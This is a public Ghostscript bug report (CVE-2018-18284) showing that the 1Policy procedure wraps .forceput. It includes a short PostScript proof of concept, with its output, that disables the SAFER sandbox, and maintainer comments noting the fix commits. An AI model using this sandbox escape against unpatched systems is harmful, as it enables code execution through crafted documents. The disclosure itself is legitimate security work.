699963 – 1Policy is a dangerous operator, any callers should be odef

Bug 699963 - 1Policy is a dangerous operator, any callers should be odef

Summary: 1Policy is a dangerous operator, any callers should be odef

Status:	RESOLVED FIXED

Alias:	None

Product:	Ghostscript
Classification:	Unclassified
Component:	Security (public) (show other bugs)
Version:	unspecified
Hardware:	PC Linux

Importance:	P4 normal
Assignee:	Ken Sharp

URL:
Keywords:

Depends on:
Blocks:

Reported:	2018-10-12 21:47 UTC by Tavis Ormandy
Modified:	2019-05-08 13:27 UTC (History)
CC List:	1 user (show)

See Also:
Customer:
Word Size:	---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.

Description Tavis Ormandy 2018-10-12 21:47:39 UTC

1Policy (from gs_setpd.ps) is basically a wrapper around .forceput, and therefore any callers need to be pseudo-operators.

Exploit:

/.forceput { <<>> <<>> 4 index (ignored) 5 index 5 index .policyprocs 1 get exec pop pop pop pop pop pop pop } def

GS>systemdict /SAFER false .forceput
GS>SAFER ==
false

See bug 699816 for a full forceput exploit.

Comment 1 Tavis Ormandy 2018-10-13 00:28:10 UTC

This is CVE-2018-18284

Comment 2 Ken Sharp 2018-10-15 10:29:31 UTC

I have a fix but I want Chris to review it, so it'll be tomorrow before it gets applied, assuming Chris is happy with the change.

Comment 3 Ken Sharp 2018-10-16 08:35:38 UTC

Fixed in commit 30cd347f37bfb293ffdc407397d1023628400b81

Comment 4 Ken Sharp 2018-10-16 08:36:45 UTC

Oops :-( Wrong way round. This one is fixed with *this* commit 8d19fdf63f91f50466b08f23e2d93d37a4c5ea0b